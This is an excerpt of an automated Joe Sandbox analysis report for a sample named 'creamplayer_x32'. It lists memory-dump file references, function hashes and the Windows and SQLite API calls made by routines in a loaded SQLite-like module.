                                                                                                    • Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                                    • Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
                                                                                                    APIs
                                                                                                    • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                                                                    • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log
                                                                                                    • String ID: NULL
                                                                                                    • API String ID: 632333372-324932091
                                                                                                    • Opcode ID: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                                    • Instruction ID: 5a36de60e8574ea04015b231464f09686a41744340efbe7a8a869d8181b3dc96
                                                                                                    • Opcode Fuzzy Hash: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                                    • Instruction Fuzzy Hash: BAF0A070238301DBD7102FA6E44230E7AEBABB0798F48C43C95A84F289D7B5C844CB63
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeavefree
                                                                                                    • String ID:
                                                                                                    • API String ID: 4020351045-0
                                                                                                    • Opcode ID: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
                                                                                                    • Instruction ID: 980a39aab3b848caec2c27f45d5308e77b440585e3cd6ccd446b63c63d51e1b6
                                                                                                    • Opcode Fuzzy Hash: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
                                                                                                    • Instruction Fuzzy Hash: 2D018070B293058BDB10DF28C985919BBFBABB6308B20855CE499D7355D770DC80EB62
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
                                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 682475483-0
                                                                                                    • Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                                    • Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
                                                                                                    • Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                                    • Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2